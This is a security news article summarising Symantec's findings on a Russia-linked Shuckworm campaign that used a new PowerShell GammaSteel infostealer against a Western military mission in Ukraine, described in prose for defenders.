A cyberespionage group of Russian origin that has targeted entities from Ukraine, or from countries that are helping Ukraine, has recently launched an attack against the military of a Western nation using an updated version of the GammaSteel malware.
Shuckworm, also known as Gamaredon, Aqua Blizzard, or Primitive Bear, is an APT group that is believed to be linked to the Russian Federal Security Service (the FSB). The group has targeted government, law enforcement, NGOs, and defense organizations in Ukraine for over a decade, with the first attacks reported in 2013. (Read more about the history of Russian cyberattacks on Ukraine.)
In a new campaign observed in February by researchers from Broadcom’s Symantec, the target was the military mission of an unnamed Western country in Ukraine. It used a complex attack chain with a series of obfuscated scripts and a new PowerShell-based version of the GammaSteel infostealer.
“While the group does not appear to have access to the same skill set as some other Russian groups, Shuckworm does now appear to be trying to compensate for this by continually making minor modifications to the code it uses, adding obfuscation, and leveraging legitimate web services, all to try lower the risk of detection,” the Symantec researchers said.
Attack chain launched from external drive
The infection analyzed by Symantec seems to have started with a Windows Shortcut file called files.lnk, launched from an external drive. This was recorded under the UserAssist key in the Registry, which stores a record of files, links, applications, and objects accessed by the current user through Windows Explorer.
After that file was executed, it launched mshta.exe, a Windows binary that can be used to execute VBScript and JScript locally on Windows. In this case, it was used to execute a JavaScript command that invoked an ActiveX object and used wscript.exe to execute a file called ~.drv.
This is a highly obfuscated file whose execution resulted in the creation of two additional files with names of the format NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms. The goal of one of the files is to contact the attackers’ command-and-control (C2) server and maintain a persistent connection with it.
The C2 servers’ IP addresses are obtained by contacting URLs hardcoded in the file and retrieving the current addresses from them. The result is two IP addresses and a domain name that all point to attacker-controlled servers.
“The [C2] server is similar to others that have been used by Shuckworm in the past, as shown in an investigation by Recorded Future where the group leveraged Cloudflare tunnels for their [C2] infrastructure,” the researchers said.
The second file in the attack chain modifies Registry values in order to change how Windows Explorer displays hidden and system files. It then infects any removable drives attached to the computer by copying .lnk files into any directories found on them. This is behavior typical of USB worms.
The file names observed by Symantec were in Ukrainian, but translate to terms such as: “Conduct plan”, “Special message”, “letter to”, “SPECIAL INSPECTION”, “Wound report”, “deployment”, “AIR DEFENSE COMBAT ORDER”, “Commander’s decision on defense”, “Obligation”, “Combat calculation”, “GUR support”, “Information on the dead”, “BMP”, “contract extension”, and “Reference about meeting with the source”.
On one machine, the researchers observed the C2 server delivering obfuscated code which was then launched via PowerShell. This started a chain of obfuscated scripts that reached out to more servers and downloaded additional PowerShell scripts.
One script served as a reconnaissance tool collecting information about the computer, including system information, the name of security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes. All this collected information was sent back to the C2 server.
New GammaSteel variant
The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories such as Desktop, Download, and Documents. The targeted extensions included .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.
The new GammaSteel version uses PowerShell web requests to exfiltrate files, and if it fails, it then falls back to using the cURL command line tool with a Tor proxy to send data out. There is also code that suggests the web service write.as was potentially used as a fallback data exfiltration channel as well.
“This attack does mark something of an increase in sophistication for Shuckworm, which appears to be less skilled than other Russian actors, though it compensates for this with its relentless focus on targets in Ukraine,” the researchers said.
The Symantec report includes indicators of compromise such as file hashes, file names, URLs, IP addresses, and more, that can be used by security teams to build detections or threat hunting rules.
No Responses